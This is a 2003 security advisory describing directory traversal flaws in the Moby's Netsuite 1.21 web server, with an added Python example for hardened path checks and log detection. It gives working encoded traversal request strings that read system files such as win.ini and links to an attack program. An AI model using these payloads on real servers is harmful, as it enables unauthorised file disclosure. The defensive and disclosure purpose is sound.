
Netsuite121.txt

Posted Jul 15, 2003
Authored by Dr. Insane | Site members.lycos.co.uk

Moby's Netsuite 1.21 httpd server is vulnerable to a multitude of directory traversal bugs that allow an attacker to access files outside of the web root.

tags | exploit, web, root
SHA-256 | c3a9e9ae00e9e67b478e9d3093cc3f9669abbf2620d5783b4b97471d46479220


Moby's Netsuite 1.21 Traversal Directory bugs


Release Date:
13 July, 2003


Description:
NetSuite is a freeware server suite that allows anyone with a static IP address the ability to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account.
Netsuite is designed for complete simplicity, requiring only a few minutes to set up with no prior network skills or experience, and it uses virtually no memory or processor time. General Windows file management and an understanding of the Internet are required. There are two components: Moby Mail and Moby Web. Both are straightforward to install and use, requiring only a few minutes to get started. Full source code for Microsoft Visual C++ 6.0 is available on the web.

There exist several directory traversal vulnerabilities that allow someone to download or read
files outside the web folder. For the attack to work, the path separators and dots must be sent URL-encoded (for example %5c for the backslash and %2e for the dot) instead of as the normal characters.


The attack:

GET / HTTP/1.1
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat

In our example above we want to read the file autoexec.bat.
***The folder /error/ doesn't exist on my PC :P hehe

Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://127.0.0.1/\..\..\..\windows\win.ini
While I was searching I found about 25 attack strings; the ones above are only a small sample.
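The strings above all rely on the same two weaknesses: the server decodes %5c and %2e after (or instead of) checking the path, and it treats a backslash as a directory separator. The following Python is an added example written for this page, not code from the advisory or from NetSuite; it shows a request-path check that canonicalises before deciding (decode, fold backslashes, collapse dot segments, then confirm the result still sits under the web root) and a small log check that flags the same patterns in constructed access-log lines. The web root /var/www and the log lines are constructed for the example.

```python
"""Hardened request-path resolution and a log check for the encoded
traversal patterns shown in the advisory.  Added example, not the
NetSuite source."""
import os
import posixpath
from urllib.parse import unquote

# Attack strings copied from the advisory (the first is the raw GET
# example's path); used here only as input to the checks below.
ADVISORY_PATHS = [
    "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat",
    "/%5c..%5c..%5c..%5cwindows%5cwin.ini",
    "/%5c..%5c..%5c..%5cwindows%5cwin%2eini",
    "/\\..\\..\\..\\windows\\win.ini",
]


def decode_fully(request_path: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded %255c is seen as the backslash it becomes."""
    decoded = request_path
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def canonical_path(request_path: str) -> str:
    """Return the web-root-relative path after decoding, folding
    backslashes to slashes, dropping NUL tricks and collapsing dot
    segments.  A result beginning with '..' means the request tried to
    climb above the root."""
    decoded = decode_fully(request_path)
    decoded = decoded.split("\x00", 1)[0]      # C-string truncation
    decoded = decoded.replace("\\", "/")       # Windows servers: \ is a separator
    relative = decoded.lstrip("/")
    return posixpath.normpath(relative) if relative else "."


def resolve_under_webroot(webroot: str, request_path: str):
    """Map a request path to a filesystem path, or None if it escapes."""
    rel = canonical_path(request_path)
    if rel == ".." or rel.startswith("../"):
        return None
    webroot_abs = os.path.abspath(webroot)
    target = os.path.abspath(os.path.join(webroot_abs, *rel.split("/")))
    # Independent OS-level check: the final path must still be inside the root.
    if os.path.commonpath([webroot_abs, target]) != webroot_abs:
        return None
    return target


def looks_like_traversal(request_path: str) -> bool:
    """Detection rule: any '..' segment after decoding and backslash folding."""
    decoded = decode_fully(request_path).replace("\\", "/")
    return any(segment == ".." for segment in decoded.split("/"))


# Constructed access-log lines in common log format (not from the advisory).
SAMPLE_LOG = [
    '127.0.0.1 - - [13/Jul/2003:10:00:01 +0300] "GET /index.html HTTP/1.1" 200 512',
    '127.0.0.1 - - [13/Jul/2003:10:00:02 +0300] "GET /%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '127.0.0.1 - - [13/Jul/2003:10:00:03 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5cautoexec.bat HTTP/1.1" 200 61',
]


def traversal_hits(log_lines):
    """Return the request paths in the given log lines that match the rule."""
    hits = []
    for line in log_lines:
        try:
            request = line.split('"')[1]       # text inside the first quotes
            path = request.split()[1]          # method, path, version
        except IndexError:
            continue
        if looks_like_traversal(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    for p in ADVISORY_PATHS:
        print(p, "->", resolve_under_webroot("/var/www", p))
    print("log hits:", traversal_hits(SAMPLE_LOG))
```

The two checks are deliberately independent: `canonical_path` rejects by inspection of the normalised relative path, and `os.path.commonpath` confirms the joined filesystem path. A server that only does the second step on the raw, still-encoded path is exactly what the advisory's strings get past.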


The Attack Program:
I have created a sample attack program for Moby's Netsuite 1.21 (possibly it works for all versions of Moby's Netsuite). You can get it from here:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/


Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.


Feedback
Please send suggestions, updates, and comments to:
Dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/